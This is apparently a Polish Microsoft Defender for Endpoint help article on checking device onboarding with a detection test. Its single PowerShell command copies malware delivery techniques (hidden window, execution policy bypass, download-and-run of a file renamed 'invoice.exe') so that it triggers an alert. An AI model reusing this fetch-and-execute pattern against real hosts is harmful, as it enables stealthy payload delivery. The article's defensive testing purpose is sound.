Uruchamianie testu wykrywania na urządzeniu niedawno dołączonym do Ochrona punktu końcowego w usłudze Microsoft Defender

Po dodaniu urządzenia do usługi Ochrona punktu końcowego w usłudze Microsoft Defender na potrzeby zarządzania jest ono określane jako dołączanie. Dołączanie umożliwia urządzeniom zgłaszanie do usługi sygnałów dotyczących ich stanu kondycji.

Sprawdzenie, czy urządzenie zostało pomyślnie dodane do usługi, jest krytycznym krokiem w całym procesie wdrażania. Pomaga to zapewnić zarządzanie wszystkimi oczekiwanymi urządzeniami.

Wymagania wstępne

Obsługiwane systemy operacyjne

• Windows Server 2012 R2
• Windows Server 2016 i nowsze
• Azure Stack HCI OS, wersja 23H2 i nowsze

Weryfikowanie Ochrona punktu końcowego w usłudze Microsoft Defender dołączania urządzenia przy użyciu testu wykrywania programu PowerShell

Uruchom następujący skrypt programu PowerShell na nowo dołączonym urządzeniu, aby sprawdzić, czy prawidłowo raportuje do usługi Defender for Endpoint.

1. Na urządzeniu otwórz wiersz polecenia jako administrator.

2. W wierszu polecenia skopiuj i uruchom następujące polecenie:

   powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
   

   Okno wiersza polecenia zostanie zamknięte automatycznie. Jeśli to się powiedzie, w portalu zostanie wyświetlony nowy alert dotyczący dołączonych urządzeń w ciągu około 10 minut.

   Uwaga

   Do wykonania tego testu można również użyć ciągu testu EICAR . Otrzymasz powiadomienie w punkcie końcowym i alert w portalu Microsoft Defender.

Artykuły pokrewne

• Dołączanie urządzeń klienckich
• Dołączanie serwerów
• Rozwiązywanie problemów z dołączaniem Ochrona punktu końcowego w usłudze Microsoft Defender